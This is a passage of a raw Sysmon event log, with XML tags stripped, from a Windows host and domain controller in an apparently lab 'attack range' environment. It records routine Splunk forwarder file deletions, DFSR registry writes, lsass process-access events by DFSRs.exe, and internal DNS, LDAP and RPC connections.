Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:51.194{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616003F883736B9B4791BB42199E0ACB,SHA256=E0351FC71011551B1F276A8B9F5841156B4388A3AE49AFE1B8CAF57D8014EFE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:51.025{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2573B828552EA4A9953D3D4F584737,SHA256=523E69C71C641F40E1057BEE730F01ECB2E423E165CD7AEC51E817E859478B4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:52.303{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9DDDF90EC6A1B8C0E5BE3377C9E4CC1,SHA256=2FDE70FFEEDE5AF90C42AE58BCC0BE1C4B55508E9A072909EDFE49027D61CADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:52.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBB01E82741938B7E8F6E2F9D6A69E92,SHA256=7B68057810692C900798C8383D5BCE18D2E2748B43F0942A66CB68861B605E88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:52.025{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0869149E69D1CADBA7E71B2C1245EC8,SHA256=12314AAB5FB6391242999DBA092BC73BDD9FBA0E15551F245D2716AA08599BD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:53.366{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA7114B92AEB408D7696C0D50277B64,SHA256=7D34E66FFF6D6D0B9D19F9BCF8B8E8EBD7ABE181DB76D3B22634D30EBAD65093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:53.040{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B5B2A02D0A9F9745210F52C777DA729,SHA256=47CFC6345ECB5617FB0F725028C8B6167B48511DB4A44CADE7A77380793EE54C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:54.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67FEB953994614CC5CB4EAC608D159EA,SHA256=A7265CB24F479D11002DA1F4D385FE46F8389FD5E5CF2011E395DF1AAB305261,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000298747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:23:54.824{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000298746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:23:54.808{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000298745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:23:54.808{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000298744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.786{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.786{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.056{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=657456924156928A438A923823FFB106,SHA256=AECC0891A0E6057C76BF6267CDFDFE821DCFA316F3D970E3B6E01962D3F91181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:55.647{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA316CCB31039943B0039711023C3CF,SHA256=32A1BFB4E494641FDCC10A3C99286292E6E9C3981F59F9560992A043894B65D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:55.686{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:55.686{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:55.686{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:55.070{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74805C6F993E5F280EA1795232B655E8,SHA256=AD094640096C60D4F5E183E008C28CA028EC35434FADA51EC4ACD84904645D9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:56.694{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B18246D49A41DE73A1F38826278EF29,SHA256=F3A27BBA6FEAA2C4AA808BCF71928780833A3237A7D598203AAC5428E3AF5853,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.704{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.703{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.539{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.539{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.539{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000298758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.299{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local65535- 354300x8000000000000000298757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.296{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local64415-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000298756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.296{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61413- 354300x8000000000000000298755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.296{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61413-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000298754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.253{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49559-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000298753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.253{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49559-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 23542300x8000000000000000298752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE5B63C350D5C5903AEAC0A4084D6C5A,SHA256=569BA7BDD78556A3540436FAAC4FB0A99E5696D75182EC96CDFB47CE6C3AB8BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:57.772{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AC4E88DC49A92DAA8BAC3C12A0384A0,SHA256=A879E5A5AE0E4C3C7FD0D7E6BCDD00F190B6A2F898C7580BE8CC16CD37E45676,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.002{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49562-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:56.002{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49562-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:55.149{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49561-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:55.149{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49561-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:54.503{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49560-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:57.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84BE330208ADC1440543E57D9925CD82,SHA256=587BC5976708E0EE69BA34EBCD7F2C7ED3B7B43AD5ABBAD001DD3BA393467139,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:58.944{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68786EB99425F0406E8F0D333F87BFC5,SHA256=219E2997356D17EB45F5629094FD6E852369C1EB221479A72D567263FCA1269A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:58.122{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15352F2F7AD9EF6B9DB875FC10C52D0B,SHA256=1D33EFB341E46653E2952A61900F8E6E788040DD3D259445CF87F84913740EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:59.959{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 